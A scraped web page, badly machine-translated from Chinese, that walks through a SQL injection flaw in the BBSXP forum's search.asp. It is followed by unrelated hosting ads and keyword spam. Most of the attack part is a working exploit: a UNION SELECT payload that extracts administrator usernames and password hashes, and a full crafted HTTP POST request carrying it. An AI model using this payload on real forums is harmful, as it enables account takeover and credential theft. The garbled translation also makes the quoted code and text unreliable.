注入bbsxp注入漏洞(BBSXP injection vulnerability)

bbsxp  时间:2021-02-07  阅读:()

bbsxp注入漏洞BBSXP injection vulnerability

BBSXP injection vulnerability

BBSXP injection vulnerability

The newBBSXP injection vulnerability reappearance, can get theadministrator account password directly

-- I found a summary of the bbsxp5 sp1 vulnerability

There was an article about BBSXP in the early days of themagazine. It was a Cookie injection attack. The author wasingenious and could think of a logical loophole.

After reading the article, the school did not read the code.Having nothing to do during the summer vacation, I downloadedthe latest version of BBSXP and read it.

BBSXP is really small and small, and the file is short and short,but it' s a bit different from a DVBBS, whether it' s a functionor an interface.

But it' s a little bit of a flaw, after three years of testing.One. Search for loopholes

BBS to string input with HTMLEncode conversion, the numerictype with int function adjustment, Isnumeric functionjudgment.

Obviously there are Numbers and strings in the query that must

not be used as input values. You can't input as a value, whydo you enter it?

That' s the crux of the matter. I scanned each file with thisidea, and it took a long time to get to search. Asp

(seem to have had a loophole before, changed the original buthave a new) found a loophole, look at the code together.<! - # include file = "setup. Asp" -- >

The < %top

If request.cookies (" username ") = empty then error (" < li >you haven' t < a href = login.asp > login ")

DetectPost

If the Request (" menu ") = "ok" then

Search = Request (" search ")

Forumid forumid = Request (" ")

TimeLimit = Request (" TimeLimit ")

The content = the HTMLEncode (Request (" content ") )

Searchxm= the HTMLEncode (Request (" searchxm "))

Searchxm2 = the HTMLEncode (Request (" searchxm2 ") )

Searchxm2 = replace (searchxm2, "@", "&")

If the content = empty then the content = Request. Cookies ("u sername ")

If isnumeric (" "&forumid&" ") then forumidor = "forumid ="& "forumid &" "and"

If the search = "author" then

The item = "&" searchxm& "= ' " & the content &" "

Elseif search = "key" then

The item= "&" searchxm2 & "like '%" & the content &%' ""End the if

If TimeLimit < > "" then TimeLimitList =" and lasttime > "&SqlNowString &" -"

SQL = "select top" &MaxSearch& "* from forum where deltopic< > 1 and" & forumidor & "" &" "&" "&" & "&" & "&" & "&" "&""

"& TimeLimitList &" order by lasttime Desc"

Rs. The Open SQL, Conn, 1

. . . . . .

Let' s take a closer look at SQL = "select top" &MaxSearch. . .This one, where MaxSearch is defined, the default value is 500,We're left with 3 out of the outside.

1. If isnumeric (" "& forumid&" ") then forumidor = "forumid=" & "forumid &" "and"

As long as the forumid input is empty, forumidor is empty.

2. If TimeLimit < > ", "then TimeLimitList =" and lasttime >"& SqlNowString &" & int "(TimeLimit) &" "

TimeLimit is an integer, input (enter a 1) , then TimeLimitListbecomes "and lasttime > now () -1",

Change to "and lasttime > getdate () -1" in MSSQL.

3. If the search = "author" then

The item= "&" searchxm& "= ' " & the content &" "

Elseif search = "key" then

The item= "&" searchxm2 & "like '%" & the content &%' ""End the if

As long as the search = "author",

If the content is arbitrary input (to lose a abcd) , then item= HTMLEncode (searchxm) = 'abcd' ,

As soon as we construct the input and pass the above statement,the SQL statement becomes:

Select top 500*from forum where deltopic < > 1 and [HTMLEncode(searchxm) ] = 'abcd'

And lasttime > now () - 1 order by lasttime Desc

There are no single quotes around the brackets enclosed inbrackets, and obviously it can be used.

Let' s look at the HTMLEncode function first

The function the HTMLEncode (fString)

FString = replace (fString, "; ", "& # 59;")

FString = server. The htmlencode (fString)

FString = replace (fString, "' ", "& # 39;")

FString = replace (fString, "-", "& # 45; & # 45;")

FString = replace (fString, "", " the & # 92; ")

FString = replace (fString, vbCrlf, "< br >")

The HTMLEncode = fString

End the function

The filter is filtered, and the filter is very tight. Theprogrammer is also very difficult, and the filter is more thanlikely to affect the use.

There are fewer safety problems. So how do we use this filter?Naturally, you have to guess,

It is a feasible method, and the structure of the table is alsoknown, and it is easy to guess. But I' ll do it in a simple way.Two. Exploit

It is also valid for both ACCESS and MSSQL with a familiar unionquery. I'mnot going to write it, just to show you the results.Select top 500 * from forum where deltopic < > 1 and

The forumid= 0 union all select top 1, 1, [user] . Username astopic, forum. Use

Rname, content, forum. Posttime forum. Postip, 1, 1, 1, 1, 1, 1, 1,[user] . Userpass as lastname,

Lasttime, polltopic clubconfig. Adminpassword as pollresult,1 the from

[user], forum, clubconfig where [user] . Membercode=5 or forum.Id = 0 or clubconfig.adminpassword

= 'abcd' and lasttime > now () - 1 order by lasttime DescThe color part is the value of the searchxm we want to enter,and each character HTMLEncode function in the middle is notf iltered.

And the implication of this statement is that the statement infront of the union is false, because the forumid cannot be 0,The union only queries a record that contains theadministrator' s user name and encryption password, as well asthe encrypted password for community management.

The friend who knows the SQL statement will see it.

The number 1 does not make sense, just to match the type of thefield, ensuring that the number of fields before and after theunion is consistent with the type.

Here you can construct your own queries, and I give you areference.

Construct the input statement and construct the submission.Think of the classic WSE, if anyone thinks that you can writeyour own submit strings for the HTTP protocol,

I should also advise him to save energy and brain power.

(figure 1)

[2]

The construction is submitted as follows:

POST/BBSXP/search. Asp? The menu = ok HTTP / 1. 1

Accept: image/GIF, image/x-xbitmap, image/jpeg, image/pjpeg,appl ication/x- shockwave - f lash, appl ication/VND. Ms-excel,Appl ication/VND. - ms powerpoint, application/msword, * / *Referer: http://localhost:8000/bbsxp/search.asp

The Accept - Language: useful - cn

The content-type: application/x - WWW - form - urlencodedThe Accept - Encoding: gzip, deflate

The user-agent: Mozilla / 4.

0 (compatible; MSIE 5.01; Windows NT 5.0; MyIE2)

Host: localhost: 8000

The Content - Length: 481

Connection: Keep Alive

The cache-control: no - Cache

Cookie: eremite = 0; Userpass =

E80B5017098950FC58AAD83C8C14978E; The username=admin; Skins= 1; ASPSESSIONIDSSRQSDTB =

OGLJMADCECKAFKGCPCCHBKHO; On l inet i me=2 d8%2004%2 d 13+2004%3 a08%3 a33; Addmin = 0

The content = fsaf&search = author&searchxm 20 forumid = % %3 d0 +union+all + select + top 1%+ 1 +2 c1 5 buser%2 c %%5 d.

Username + + topic as %2 cforum. The username% 2 ccontent %2 cforum. Posttime %2 cforum. Postip%2 c1%2 c1%2 c1%2 c1%2C1%2 C1%2 C1%2 c%5 buser%5 d. The userpass +as + lastname%2 clasttime%2 cpolltopic%2 cclubconfig. Adminpassword+ as+ pollresult % 2 c1 + from + % 5 buser cforum% 2 c % 5 d % 2Clubconfig +where + 5 buser % % 5 d. The membercode % 3 d5 +or + forum.

Id % 3 d0 + or + clubconf ig. Adminpassword&searchxm 2 =topic&TimeLimit = & forumid = & submit 1 = % BF % % % AA % CABC

CB % % % CB D1 F7

I've written an HTML page for the searchxm part, which can be

无视CC攻击CDN ,DDOS打不死高防CDN,免备案CDN,月付58元起

快快CDN主营业务为海外服务器无须备案,高防CDN,防劫持CDN,香港服务器,美国服务器,加速CDN,是一家综合性的主机服务商。美国高防服务器,1800DDOS防御,单机1800G DDOS防御,大陆直链 cn2线路,线路友好。快快CDN全球安全防护平台是一款集 DDOS 清洗、CC 指纹识别、WAF 防护为一体的外加全球加速的超强安全加速网络,为您的各类型业务保驾护航加速前进!价格都非常给力,需...

HostYun 新增美国三网CN2 GIA VPS主机 采用美国原生IP低至月15元

在之前几个月中也有陆续提到两次HostYun主机商,这个商家前身是我们可能有些网友熟悉的主机分享团队的,后来改名称的。目前这个品牌主营低价便宜VPS主机,这次有可以看到推出廉价版本的美国CN2 GIA VPS主机,月费地址15元,适合有需要入门级且需要便宜的用户。第一、廉价版美国CN2 GIA VPS主机方案我们可看到这个类型的VPS目前三网都走CN2 GIA网络,而且是原生IP。根据信息可能后续...

PhotonVPS:$4/月,KVM-2GB/30GB/2TB/洛杉矶&达拉斯&芝加哥等

很久没有分享PhotonVPS的消息,最近看到商家VPS主机套餐有一些更新所以分享下。这是一家成立于2008年的国外VPS服务商,Psychz机房旗下的站点,主要提供VPS和独立服务器等,数据中心包括美国洛杉矶、达拉斯、芝加哥、阿什本等。目前,商家针对Cloud VPS提供8折优惠码,优惠后最低2G内存套餐每月4美元起。下面列出几款主机配置信息。CPU:1core内存:2GB硬盘:30GB NVm...

bbsxp为你推荐
暴风影音怎么截图请问如何在暴风影音上截图伪静态如何设置伪静态规则伪静态伪静态和真静态哪种静态方式好今日热点怎么删除千牛里面的今日热点怎么取消_?安卓应用平台有没有什么安卓游戏都能找到的应用商店或者游戏中心畅想中国用“心系祖国情,畅想中国梦”为题目的800字作文怎么升级ios6苹果IOS5怎么升级IOS6版本lockdowndiphone4s 完美越狱5.1.1时出现Could not connect to lockdownd。求救啊!!ejb开发EJB是啥玩意了iphone6上市时间苹果6什么时候在中国大陆上市
域名注册使用godaddy 域名服务器上存放着internet主机的 bandwagonhost isatap 美国主机论坛 商家促销 亚洲小于500m 网通ip 有益网络 699美元 idc是什么 中国电信测速网 中国网通测速 ca187 免费私人服务器 中国电信测速网站 photobucket 测速电信 域名转入 乐视会员免费领取 更多